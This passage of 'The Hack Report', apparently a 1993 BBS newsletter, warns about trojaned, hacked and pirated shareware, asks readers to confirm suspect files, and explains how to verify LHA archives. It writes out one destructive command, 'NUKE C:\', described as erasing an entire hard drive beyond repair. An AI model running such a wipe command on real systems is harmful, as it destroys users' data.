  1371.  
  1372.  
  1373.   Long time readers of this report will remember a question concerning the
  1374.   status of a screen saver called TUNNEL.  Ove Lorentzon (2:203/403.6) and
  1375.   Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
  1376.   Steiner) both stated that the program was an internal IBM test program
  1377.   and was not intended for outside distribution.
  1378.  
  1379.   Your Hack Squad has received word from the author of the program, Dan
  1380.   Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
  1381.   the program has never been released to the general public.  According to
  1382.   Dan, "it is still owned by IBM, and as such has been given the IBM
  1383.   security classification 'IBM Internal Use Only' which means what it says:
  1384.   the program is not for distribution to non-IBM employees."
  1385.  
  1386. | Dan also says that several other "Internal Use Only" programs have been
  1387. | "leaked" to the outside world, which implies that these files should not
  1388. | be posted for download.  One such program was originally called Dazzle
  1389. | (NOT to be confused with the other popular DAZZLE screensaver), but has
  1390. | entered BBS distribution under the filename O-MY-GOD (also seen as OMG,
  1391. | per Michael Burkhart (RIME address CENTER, via HW Richard Steiner).
  1392. | However, note that the O-MY-GOD/OMG file was hacked, according to Dan, so
  1393. | that all of the "Internal Use Only" references were removed.
  1394.  
  1395.   Another is a program that is usually included inside other archives:  the
  1396.   program name is PLAYANI.  Dan says this has been distributed "along with
  1397.   various animations," and also falls under the same Internal
  1398.   classification.
  1399.  
  1400.   A prime example of this is an archive called BALLS (not what you think).
  1401.   This is an animation of multiple chrome spheres rotating around each
  1402.   other above a red and white checkerboard platform.  In this case, both
  1403.   the player (PLAYANI) _and_ the animation are the property of IBM and are
  1404.   not intended for BBS distribution.
  1405.  
  1406.   Again, to quote Dan, "None of these programs are for external
  1407.   distribution; all are owned by IBM and are only for use inside IBM by IBM
  1408.   employees."  Thanks to Dan for all of his help.
  1409.  
  1410.  
  1411.   Donn Bly has cleared up the question on the status of the Sydex program
  1412.   TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
  1413.   Donn was kind enough to mail a copy of a letter sent to him by Sydex
  1414.   explaining that Teledisk is no longer shareware.  Here is an excerpt from
  1415.   the letter:
  1416.  
  1417.        "Effective April 1991, TeleDisk is no longer a shareware
  1418.        product.  After long consideration, we decided to
  1419.        discontinue our offering of the shareware edition of
  1420.        TeleDisk, and license it only as a commercial product.
  1421.  
  1422.        "Commercial licenses of TeleDisk are available from Sydex at
  1423.        $150 a copy.  All shareware distributors and BBS sysops who
  1424.        take time to check their sources are requested to remove
  1425.        TeleDisk from shareware distribution."
  1426.  
  1427.   The letter is signed by Miriam St. Clair for Sydex.  To summarize, Sydex
  1428.   is no longer accepting shareware registrations for TeleDisk, and asks
  1429.   that it be not be made available for download from BBS systems.
  1430.  
  1431.   Thanks to Donn for his help in this matter.
  1432.  
  1433.  
  1434.   HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
  1435.   Barnes of Mustang Software, Inc., about a "patch" program aimed at
  1436.   OffLine Xpress (OLX) v1.0.  The patch is supposed to allow OLX to
  1437.   read and reply to Blue Wave packets, along with a lot of other seemingly
  1438.   unbelievable feats.  Gwen Barnes did not seem to know of the patch, but
  1439.   published the following advice in the WildNet SLMROLX conference to
  1440.   anyone considering trying it:
  1441.  
  1442.     1. Make a complete backup of your system.
  1443.     2. Make sure you've got all the latest SCAN stuff from McAfee
  1444.     3. Try it, keeping in mind that it more than likely does nothing
  1445.        at all, or is a trojan that will hose your system.
  1446.     4. Get ready to re-format and restore from backups if this is in
  1447.        fact the case.
  1448.  
  1449.   No filename was given for this patch.  If anyone runs across a copy of
  1450.   it, please contact one of The HackWatchers or myself so that we can
  1451.   forward a copy to MSI for testing.
  1452.  
  1453.  
  1454.   HW Bill Lambdin reports that someone has taken all of McAfee Associates'
  1455.   antiviral programs and combined them into one gigantic (over 700k)
  1456.   archive.  He did not say whether the files had been tampered with, but he
  1457.   did send a copy to McAfee for them to dissect.  The file was posted under
  1458.   the filename MCAFEE99.  I would not suggest downloading this file:  as a
  1459.   matter of fact, this reporter prefers to call McAfee's BBS directly when
  1460.   a new version of any of their utilities comes out.  I highly recommend
  1461.   this method, since it insures that you will receive an official copy.
  1462.  
  1463.  
  1464.   HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
  1465.   echo about possible Trojans going around as PKZIP 2.21 and/or 2.22.  Stu
  1466.   also says that there is a warning about these in circulation.  If you
  1467.   have a copy of this warning, please send a copy to Hack Central Station
  1468.   (1:124/4007).
  1469.  
  1470.   =========================================================================
  1471.  
  1472.                             Information, Please
  1473.  
  1474.   This the section of The Hack Report, where your Hack Squad asks for
  1475.   _your_ help.  Several reports come in every week, and there aren't enough
  1476.   hours in the day (or fingers for the keyboards) to verify them all.  Only
  1477.   with help from all of you can The Hack Report stay on top of all of the
  1478.   weirdness going on out there in BBSLand.  So, if you have any leads on
  1479.   any of the files shown below, please send it in: operators are standing
  1480.   by.
  1481.  
  1482.  
  1483. | Harold Stein (1:107/236) found a file called STETRIS, claiming to be a
  1484. | Super Tetris game.  He says that there was a shareware version of this
  1485. | that was released about a year ago, but has since been renamed due to a
  1486. | conflict with a commercial game of the same name.  He is not sure whether
  1487. | or not he found the old shareware file or a pirated copy of the
  1488. | commercial file.  The archive (in .zip format, presumably using v2.04g)
  1489. | was 55,318 bytes long, and the archive date had been "touched" by the BBS
  1490. | it was uploaded to, forcing it to March 23, 1993 (Editorial: this renders
  1491. | filedates rather useless, IMHO. -lj)  Does anyone know which version
  1492. | Harold has seen?  If so, please advise.
  1493.  
  1494.  
  1495. | Peter Hempel (1:229/15) posted a message in the FidoNet Echo VIRUS about
  1496. | the file BREAKIT!, which was described as follows:
  1497. |
  1498. | BREAKIT!.ZIP  6714  03-29-93  (CRS) A Gw-Basic Code And Cipher Program
  1499. |                               Allowing You To Enter Ascii Characters, To
  1500. |                               Save Them, And To Encode And Decode.
  1501. |
  1502. | Peter claims that this program erased his root directory, but says he was
  1503. | able to recover everything by booting from a write-protected system disk
  1504. | and using the Norton Utilities UNERASE command.  The archive contents are
  1505. | as follows:
  1506. |
  1507. |  Name         Original Method     Packed CR%   Date     Time   CRC
  1508. |  ============ ======== ======== ======== === ======== ======== ========
  1509. |  BREAKIT!.BAS     4453 Implode      2604  58  1-24-93 11:25:24 42CA0CE4
  1510. |  CODEFILE.FIL     1240 Implode       550  44  3-28-92 10:52:44 B6ADEB20
  1511. |  PRINTME.BAT        31 Stored         31 100  1-24-93 11:54:12 965CF8AE
  1512. |  VIEW.COM          958 Implode       876  91  3-19-92 19:11:46 47C5E5EF
  1513. |  README.BAT         30 Stored         30 100  1-24-93 11:52:32 95294A43
  1514. |  BRK.BAT            40 Stored         40 100  1-24-93 11:53:32 FC9F3B2E
  1515. |  BREAKIT!.DOC     2679 Implode      1440  54  1-24-93 11:56:06 EC302AFA
  1516. |  ============ ======== ======== ======== === ======== ======== ========
  1517. |         7         9431 ZIP          5571  59  1-24-93 11:56:06
  1518. |
  1519. | He did not say which file did the damage.  I do not know if this is a
  1520. | Trojan or an infected file - in either case, it may well be an isolated
  1521. | incident.  Test results would be greatly appreciated.
  1522.  
  1523.  
  1524. | Lowell Shatraw (1:315/6) states that there may be two pirated commercial
  1525. | fax programs floating around under the filenames FAX and PC_FAX.  The
  1526. | archives he reported on were in ARJ format and were 447,693 and 101,089
  1527. | bytes long, respectively.  The file dates were Dec. 4, 1992, and May 26,
  1528. | 1992 - no way to tell if the BBS "touched" the filedates.  Lowell is also
  1529. | not sure which commercial products these may be.  If you happen to run
  1530. | across one or both of these, please look inside them - if they are
  1531. | commercial, please let me know (after you delete your copies, of course!
  1532. | <g>).
  1533.  
  1534.  
  1535.   A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
  1536.   states that he had a user upload a file called TAG-NFO, which turned out
  1537.   to be a Trojan.  No details about the Trojan were given, so any
  1538.   confirmation of this would be appreciated.
  1539.  
  1540.  
  1541.   HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
  1542.   Conference about two files.  The archives, called PHOTON and NUKE, are
  1543.   possibly droppers, containing a file called NUKE.COM which "will trash
  1544.   your HD."
  1545.  
  1546.   Pat Finnerty (1:3627/107) sent a reply to the last report of this,
  1547.   stating that he has a copy of a PC Magazine utility called NUKE.COM,
  1548.   which is used to remove subdirectories which contain "nested subs,
  1549.   hidden, read-only (you name it)."  He says that the command NUKE C:\ will
  1550.   effectively delete everything on a hard drive, with no chance of repair.
  1551.   This is merely the way the program is designed.
  1552.  
  1553.   I do not know if this is what happened in Mario's case, or if Mario
  1554.   actually found a copy (read: isolated incident) which was infected. Bill
  1555.   has asked Mario for further information, and I would like to echo his
  1556.   call for help.  If you know of this, please lend a hand.
  1557.  
  1558.  
  1559.   Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
  1560.   echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
  1561.   Rich Bongiovanni.  Rich reports that there is a file floating around
  1562.   called DEMON WARS (archive name DMNWAR52) that is "infected with a
  1563.   virus."  If true, this may be an isolated incident.  I would appreciate
  1564.   confirmation on this.
  1565.  
  1566.  
  1567.   Greg Walters (1:270/612) reports a possible isolated incident of a
  1568.   problem with #1KEEN7.  When he ran the installation, he began seeing on
  1569.   his monitor "what looked like an X-rated GIF."  The file apparently
  1570.   scanned clean.  Any information on similar sightings would be
  1571.   appreciated.
  1572.  
  1573.  
  1574.   A report from Todd Clayton (1:259/210) concerns a program called
  1575.   ROBO.EXE, which he says claims to apparently "make RoboBoard run 300%
  1576.   faster."  He says he has heard that the program fools around with your
  1577.   File Allocation Table.  I have not heard any other reports of this, so I
  1578.   would appreciate some confirmation from someone else who has seen similar
  1579.   reports.
  1580.  
  1581.  
  1582.   Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
  1583.   possible hack of FEBBS called F192HACK.  I have not seen this file, nor
  1584.   has the author of FEBBS, Patrik Sjoberg (2:205/208).  He forwards the
  1585.   file sizes in the archive, reported here:
  1586.  
  1587.         Name          Length      Mod Date  Time     CRC
  1588.         ============  ========    ========= ======== ========
  1589.         FEBBS.EXE       220841    09 Mar 92 21:17:00 96D2E08D
  1590.         014734.TXT        1403    26 Aug 92 01:59:18 3B9F717F
  1591.         ============  ========    ========= ======== ========
  1592.         *total     2    222244    26 Aug 92 01:59:24
  1593.  
  1594.   Kelvin says the .TXT file is just an advert for a BBS, so it is "not
  1595.   relevant!".  As I said, the author of FEBBS has never seen this file, so
  1596.   I've asked Kelvin to forward a copy of it to him.
  1597.  
  1598.  
  1599.   Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
  1600.   Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
  1601.   the author of Maximus, says he did not write any programs that have these
  1602.   names, but he does not know whether they are or are not legitimate third
  1603.   party utilities.  I have requested further information from Andrew on
  1604.   this topic, and would appreciate anyone else's information, if they have
  1605.   any.
  1606.  
  1607.  
  1608.   Yet another short warning comes from David Bell (1:280/315), posted in
  1609.   the FidoNet SHAREWRE echo, about a file called PCPLSTD2.  All he says is
  1610.   that it is a Trojan, and that he got his information from another
  1611.   "billboard" and is merely passing it on.  Again, please help if you know
  1612.   what is going on here.
  1613.  
  1614.  
  1615.   A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
  1616.   grabbed my attention the moment I saw it: in capital letters, it said,
  1617.   "DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!".  He
  1618.   goes on to say that two BBSs have been destroyed by the file.  However,
  1619.   that's about all that was reported.  I really need more to go on before I
  1620.   can classify this as a Trojan and not just a false alarm (i.e., archive
  1621.   name, what it does, etc.).  Please advise.
  1622.  
  1623.  
  1624.   Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
  1625.   Echo (FidoNet) about a version of ARJ called 2.33.  It was unclear as to
  1626.   whether or not Mr.  Mills had seen the file.  Mr.  Jung has repeated that
  1627.   the latest version of ARJ is v2.30 (however, there is a legitimate public
  1628. | "pre-release" version numbered 2.39f).  It is possible that the
  1629.   references Greg saw about 2.33 were typos, but you never know.  Please
  1630.   help your Hack Squad out on this one - if you see it, report it.
  1631.  
  1632.   =========================================================================
  1633.  
  1634.                            The Meier/Morlan List
  1635.  
  1636.   Here are this month's updates on the status of the files contained in the
  1637.   Meier/Morlan List.
  1638.  
  1639.  
  1640. | Shane Paul of Softdisk Publishing (RIME, via HW Richard Steiner),
  1641. | comments on the SLORDAX game:
  1642. |
  1643. |   "If the SLORDAX game if by Gamer's Edge and copyrighted by Softdisk
  1644. |    then it is a pirated copy."
  1645. |
  1646. | I can't be sure that this is the case, so the file stays on the list
  1647. | until someone can verify this.
  1648.  
  1649.  
  1650.             === Previous comments on the files in the list: ===
  1651.  
  1652.   Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
  1653.   Simulator by Mindscape, Inc.  He says that he hasn't seen anything from
  1654.   them in quite a while, and doesn't know if the company is still in
  1655.   business.
  1656.  
  1657.  
  1658.   Here are the remaining unresolved reports from HW Emanuel Levy:
  1659.  
  1660.   "387DX  - sounds like a Math Co-Processor emulator - might be legit
  1661.  
  1662.   "Barkeep sounds like it may be a version of Tapper. If you send beer mugs
  1663.   down the screen to patrons and then have to pick up the returning mugs
  1664.   and they leave tips, then it is Tapper. Or it may be an OLD game
  1665.   published in Compute Mag. If it is the one from Compute only those who
  1666.   have the Compute issue with the game in it are allowed to have a copy.
  1667.  
  1668.   "Harrier is either Harrier Jiump Jet or Space Harrier from Sega wich came
  1669.   out for the Commodore 64 in 89 so I would assume it came out for IBM
  1670.   around then too.
  1671.  
  1672.   "Gremlins- There was an Gremlins Text Adventure and a Video Came for the
  1673.   computer. The video game was put out by Atari
  1674.  
  1675.   Thanks, Emanuel.
  1676.  
  1677.  
  1678.   For those who have missed it before, here is what is left of the list of
  1679.   files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
  1680.   of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system.  Joe
  1681.   says Wes keeps a bulletin of all rejected files uploaded to him and the
  1682.   reasons they were rejected.  Joe also says he cannot confirm or deny the
  1683.   status of any of the files on the list.
  1684.  
  1685.   There are some that I am not familiar with or cannot confirm.  These are
  1686.   listed below, along with the description from Wes Meier's list.
  1687.  
  1688.   Due to the unconfirmed nature of the files below, the filenames are not
  1689.   included in the HACK????.COL and HACK????.IDX files that are a part of
  1690.   the archive of The Hack Report.  I would appreciate any help that
  1691.   anyone can offer in verifying the status of these files.  Until I receive
  1692.   verification on them, I will not count them as either hacks or pirated
  1693.   files.  Remember - innocent until proven guilty.
  1694.  
  1695.   My thanks go to Joe and Wes for their help.
  1696.  
  1697.         Filename  Reason for Rejection
  1698.         ========  =============================================
  1699.         BARKEEP   Too old, no docs and copyrighted with no copy
  1700.                   permission.
  1701.         HARRIER   Copyrighted.  No permission to copy granted.
  1702.         SLORGAME  Copyrighted.  No docs.  No permission to copy
  1703.                   granted.
  1704.         NOVELL    Copyrighted material with no permission to
  1705.                   BBS distribute
  1706.         DRUMS     I have no idea if these are legit or not.  No
  1707.                   docs.
  1708.         GREMLINS  No documantation or permission to copy given.
  1709.         CLOUDKM   A hacked commercial program.
  1710.         MENACE    Copyrighted.  No docs.  No permission to copy
  1711.                   granted.
  1712.         AIRBALL   A hacked commercial program.
  1713.         SNOOPY    Copyrighted.  No docs.  No permission to
  1714.                   copy granted.
  1715.         SLORDAX   Copyrighted.  No docs.  No permission to
  1716.                   copy granted.
  1717.         ESCAPE    Copyrighted.  No docs.  No permission to
  1718.                   copy granted.
  1719.         BANNER    Copyrighted.  No docs.  No permission to
  1720.                   copy granted.
  1721.         387DX     Copyrighted.  No docs or permission to
  1722.                   copy granted.
  1723.         WINDRV    Copyrighted.  No permission to copy granted.
  1724.  
  1725.   =========================================================================
  1726.  
  1727.                                   Help!!!
  1728.  
  1729.   Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
  1730.   The Hack Squad for testing/verification please re-identify themselves via
  1731.   NetMail?  Somehow, your message went to the great Bit Bucket in the sky.
  1732.   Thanks in advance!
  1733.  
  1734.   =========================================================================
  1735.  
  1736.                          Clarifications and Thanks
  1737.  
  1738. | Folks, the LHA mystery has finally been resolved, thanks to Scott Fell
  1739. | (1:124/6119), Steve Quarrella (1:124/9005), and Kenjirou Okubo, the
  1740. | support person for LHA.  Your Hack Squad finally received the Internet
  1741. | address for Kenjirou Okubo (kenjirou@mathdent.im.uec.ac.jp), and managed
  1742. | to verify Scott Fell's own contact, relayed via Steve.
  1743. |
  1744. | If you recall, Onno Tesink (2:283/318) found a file called LHA255B.  This
  1745. | claims to be version 2.55b of the LHA archiver, with a file date in the
  1746. | executable of 12/08/92.  Onno's report was the one that started the
  1747. | search.
  1748. |
  1749. | Kenjirou knew of this version and verified its legitimacy.  He also
  1750. | provided some other very helpful information, which is best relayed by
  1751. | quoting his message to me:
  1752. |
  1753. |      "For DOS, currently lha256a1 is under testing in a closed
  1754. |      circle for networking environment. After LHA213, dos5 appeared
  1755. |      in Japan and Yoshi started his series LHA25x series. The two
  1756. |      versions you mentioned seem to fall under this series. The
  1757. |      latest version which might be distributed by me is LHA254 for
  1758. |      people who wants to test -lh6- algorithm."
  1759. |
  1760. | He went on to provide the following information on how to verify your
  1761. | copy of LHA:
  1762. |
  1763. |      "Any version ending with LHA25xb is a beta test version, and
  1764. |      LHA25xa is for a limited circulation. To test whether these
  1765. |      files are legitimate release either from Yoshi or me, please
  1766. |      use -t option to check two dimensional CRC self-validation
  1767. |      check. We believe our test will check the validation with
  1768. |      10E-38 % of error probability."
  1769. |
  1770. | From my own testing, here is the best way to run the verification:
  1771. |
  1772. |   1.  Extract LHA.EXE from the suspect archive and place it in an
  1773. |       empty subdirectory that is not on your path.  (example:
  1774. |       c:\foo\lha.exe).
  1775. |
  1776. |   2.  Change directories to the one which contains a known good copy
  1777. |       of LHA.EXE.
  1778. |
  1779. |   3.  Execute the command LHA t drive:\path\LHA.EXE.  Using the above
  1780. |       example, your command line would look like this:
  1781. |
  1782. |               C:\LHADIR>LHA t C:\FOO\LHA.EXE
  1783. |
  1784. | This will execute the known good copy of lha, which will test the suspect
  1785. | copy and report whether or not the file "appears" to be the original or
  1786. | not.  Even though the older LHA is doing the testing, it will be able to
  1787. | verify the newer copy.
  1788. |
  1789. | Please note that Scott Fell's information was that the author does not
  1790. | want these copies distributed.  However, it seems that the folks working
  1791. | on LHA are aware that some betas have "escaped" into circulation.  In
  1792. | other words, use any betas _entirely_ at your own risk.
  1793. |
  1794. | Scott and Steve have my undying gratitude for helping to lay this to
  1795. | rest, most notably by locating Kenjirou's Internet address and following
  1796. | through on it.  Thanks from all of us!
  1797.  
  1798.  
  1799. | Now, for a few goodbyes:  since I've moved to Garland, TX, I'd like to
  1800. | take this opportunity to publicly thank Mark Evans (1:382/90), Michael
  1801. | Masterson (1:382/0), Jim Westbrook (1:382/29), Bill Degnan (1:382/39),
  1802. | Tom Lane (1:382/91), and Johnny Pulliam (1:382/77), along with everyone
  1803. | else who is a part of Net382.  I'd also like to thank Kent Anderson,
  1804. | formerly Moderator of the FidoNet International Echo SHAREWRE (now
  1805. | Co-Moderator), who also lives in Austin, TX, which Net382 encompasses,
  1806. | and Kevin Basey (1:19/23), another Austin resident.  If it weren't for
  1807. | the help and guidance of these individuals, The Hack Report wouldn't
  1808. | exist.  I feel that I've left behind a great bunch of people who I will
  1809. | miss very much.  Good luck, folks, and best wishes.
  1810. |
  1811. | Finally, I'd like to thank Iain Brown (1:124/0) and Harry McDow
  1812. | (1:124/4218) for allowing me to transfer my private node to the DFW area
  1813. | and for helping to make the transition as painless as possible.  While I
  1814. | will miss Net382 very much, I am looking forward to my tenure as a member
  1815. | of Net124.
  1816.  
  1817.   *************************************************************************
  1818.  
  1819.                                 Conclusion
  1820.  
  1821.   If you see one of these on a board near you, it would be a very friendly
  1822.   gesture to let the SysOp know.  Remember, they can get in just as much
  1823.   trouble as the fiend who uploads pirated files, so help them out if you
  1824.   can.
  1825.  
  1826.                           ***HACK SQUAD POLICY***
  1827.  
  1828. | The intent of this report is to help SysOps and Users to identify
  1829. | fraudulent files.  To this extent, I give credit to the reporter of a
  1830. | confirmed hack.  On this same note, I do _not_ intend to "go after" any
  1831. | BBS SysOps who have these programs posted for d/l.  The Shareware World
  1832. | operates best when everyone works together, so it would be
  1833. | counter-productive to "rat" on anyone who has such a file on their board.
  1834. | Like I said, my intent is to help, not harm.  SysOps are strongly
  1835. | encouraged to read this report and remove all files listed as "confirmed"
  1836. | from their boards.  I can not and will not take any "enforcement action"
  1837. | on this, but you never know who else may be calling your board.  Pirated
  1838. | commercial software posted for d/l can get you into _deeply_ serious
  1839. | trouble with certain authorities.
  1840.  
  1841.   Updates of programs listed in this report need verification.  It is
  1842.   unfortunate that anyone who downloads a file must be paranoid about its
  1843.   legitimacy.  Call me a crusader, but I'd really like to see the day that
  1844.   this is no longer true.  Until then, if you _know_ of a new official
  1845.   version of a program listed here, please help me verify it.
  1846.  
  1847.   On the same token, hacks need to be verified, too.  I won't be held
  1848.   responsible for falsely accusing the real thing of being a fraud.  So,
  1849.   innocent until proven guilty, but unofficial until verified.
  1850.  
  1851.   Upcoming official releases will not be included or announced in this
  1852.   report.  It is this Moderator's personal opinion that the hype
  1853.   surrounding a pending release leads to hacks and Trojans, which is
  1854.   exactly the opposite of what I'm trying to accomplish here.
  1855.  
  1856.   If you know of any other programs that are hacks, bogus, jokes, hoaxes,
  1857.   etc., please let me know.  Thanks for helping to keep shareware clean!
  1858.  
  1859.                    Lee Jackson, Author, The Hack Report
  1860.      Moderator, FidoNet Int'l Echos SHAREWRE and WARNINGS (1:124/4007)